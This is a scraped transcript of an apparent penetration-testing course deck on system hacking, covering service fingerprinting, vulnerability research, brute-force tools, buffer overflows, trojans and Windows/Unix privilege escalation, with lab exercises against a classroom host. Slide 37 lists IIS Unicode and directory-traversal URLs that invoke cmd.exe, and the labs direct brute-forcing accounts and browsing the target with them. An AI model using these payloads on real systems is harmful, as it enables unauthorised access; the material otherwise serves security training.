1 / 101

System Hacking

System Hacking. Section 4. Outline. Service identification Vulnerability identification and research Exploits Putting it all together Target selection in large networks Using automated tools. Service Identification. Section 4.1. Service Identification. Common ports Banners

happy
Download Presentation

System Hacking

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. System Hacking Section 4

  2. Outline • Service identification • Vulnerability identification and research • Exploits • Putting it all together • Target selection in large networks • Using automated tools

  3. Service Identification Section 4.1

  4. Service Identification • Common ports • Banners • Fingerprinting

  5. Connecting to ports • Telnet or netcat is the best way to connect to ports • Many services may be accessed directly

  6. Common ports Many services can be identified by their common port numbers

  7. Zone-h.org

  8. Alldas.de

  9. Banners Some services may be better identified by banners: • telnet on routers (2001, 4001, 6001) • Web daemons for applications • Compaq Insight Manager • Many systems include web configuration interfaces

  10. Banners

  11. Fingerprinting Some services cannot be clearly identified just by connecting the them: • Netbus on NT uses the same port as an RPC service on Solaris • Some database connections do not provide automatic response Fingerprinting a service may identify what it is, even if it has moved ports

  12. Fingerprinting

  13. Vulnerability Research Section 4.2

  14. Vulnerability identification and research • This is the process of mapping identified security attributes of a system or application to potential vulnerabilities Several methods to map vulnerabilities: • Manually map identified systems against publicly available database such as www.securityfocus.com, www.cert.org and vendor security alerts • Use public exploit code posted to various security mailing lists, hacker websites or write your own code • Use automated vulnerability scanning tools such as Nessus, ISS or whisker

  15. Vulnerability research

  16. Lab • Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified. • www.securityfocus.com • General searches on google.com • www.packetstormsecurity.com • www.astalavista.box.sk • www.securiteam.com Time: 30 minutes

  17. Exploits Section 4.3

  18. Types of exploits • Remote exploits • Trojans • Privilege escalation

  19. Remote Exploits Section 4.3.1

  20. Remote exploits A ‘remote exploit’ attempts to gain access across the network and without proper authentication. Examples: • Brute force authentication attempts • Attacks bypassing integrity checkers • Buffer overflows • Sniffing (to some extent)

  21. Brute force attacks Most common services attacked • Telnet • FTP • “R” commands • Secure Shell • SNMP community names • Post Office Protocol (POP) • HyperText Transport Protocol (HTTP/HTTPS) • SMB

  22. Common Tools used • Brutus • Admsnmp • Admsmb • TeeNet • Pwscan.pl • Thc_hydra

  23. Remote password guessing • Attempting to connect to an enumerated share such as (ADMIN$ and C$) and trying username/password combinations until one works • A “null session” can be established with the target to obtain valid account names • Use an automated password guessing tool to brute force the selected shares.

  24. Brute force attacks under Windows • Some common services prone to brute-force: • Web • Netbios • FTP

  25. Legion

  26. Brute force attacks under Unix • Some common services prone to brute-force: • telnet • Ssh • Web • FTP • R-commands

  27. Lab • Use a Netbios scanning tool to identify local shares on this network • Use brute force tool to attempt access to an account on 10.0.1.120 • Warning! These tools can produce significant traffic and lock accounts. Time: 30 minutes

  28. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Stack overflows • Format string overflows • Heap overflows • Overflow subverting the control path

  29. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE

  30. Buffer overflow attacks FULL WORKSHOP ON BUFFER OVERFLOWS AVAILABLE from LOUD-FAT-BLOKE • Occurs when a user or process attempts to place more data into a buffer than was originally allocated • Commonly associated with C functions like strcpy(), strcat(), sprintf() and etc • Most frequently found when user input is taken and passed into an application

  31. Windows buffer overflows • Only a few conditions have been revealed to date • All of them exploited flaws in application programs • Very common for DoS attacks Exploits • Netmeeting 2.x by Cult of the Dead Cow • NT RAS by Cerberus Information Security • Winhlp32 by Cerberus Information Security • IISHack by eEye • Oracle Web Listener 4.0 by CIS • Outlook GMT token overrun by Underground Security Systems Research • IIS .printer

  32. Unix buffer overflows • Sadmind • ftp • Ssh • nfs

  33. Unexpected input • Bypassing integrity checks • Gaining access by providing unexpected input • IIS unicode • Web applications

  34. Format string attacks • Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf() • Efforts usually focused on SUID root programs

  35. Input validation attacks • Occurs when a program fails to recognise syntactically incorrect input • Occurs when a module accepts extraneous input • Occurs when a module fails to handle missing input fields • A field-value correlation error occurs • Common in web applications

  36. IIS vulnerabilities • Unicode and URL based attacks • Special tags in HTTP • Sample scripts to brute force

  37. IIS hacking • /scripts/root.exe?/c+dir • /MSADC/root.exe?/c+dir • /c/winnt/system32/cmd.exe?/c+dir • /d/winnt/system32/cmd.exe?/c+dir • /scripts/..%255c../winnt/system32/cmd.exe?/c+dir • /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir • /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir • /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir • /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir • /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

  38. Lab • Use the provided URLs to roam the filesystem of 10.0.1.120 • What is accessible and what is not? Time: 10 minutes

  39. Trojan Horses and Backdoors Section 4.3.2

  40. Windows trojans and backdoors These programs provide unauthorised access to a system without the user’s knowledge: • Theef • CDC BackOrifice • SubSeven • Moosucker A great site: http://www.tlsecurity.net

  41. Tlsecurity.net

  42. Privilege Escalation Section 4.3.3

  43. Privilege escalation • Attack used to move from normal user to superuser • Quest for Administrator • Quest for root

  44. Quest for Administrator • Hoovering information • Getadmin • Sechole • Spoofing LPC Port requests

  45. Hoovering information • Identify further information that will gain higher privileges • Srvinfo • Find utility • regdmp

  46. Getadmin • Windows NT 4 • Small program written by Konstantin Sobolev • Adds users to the local admin group • Hijacks a process called winlogon • Patched by NT SP3

  47. Sechole • Similar functionality to getadmin • Modifies instructions in the memory of the OpenProcess API • Possible to launch remotely if IIS is running • Patched by NT SP6a

  48. Spoofing LPC Port Requests • Vulnerability identified by The RAZOR Team at http://razor.bindview.com • The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API

  49. Quest for root • Local buffer overflow • Symlink • File Descriptor attacks • Signal handling • Core-file manipulation • Shared libraries • Kernel flaws • System misconfiguration • IFS attacks

More Related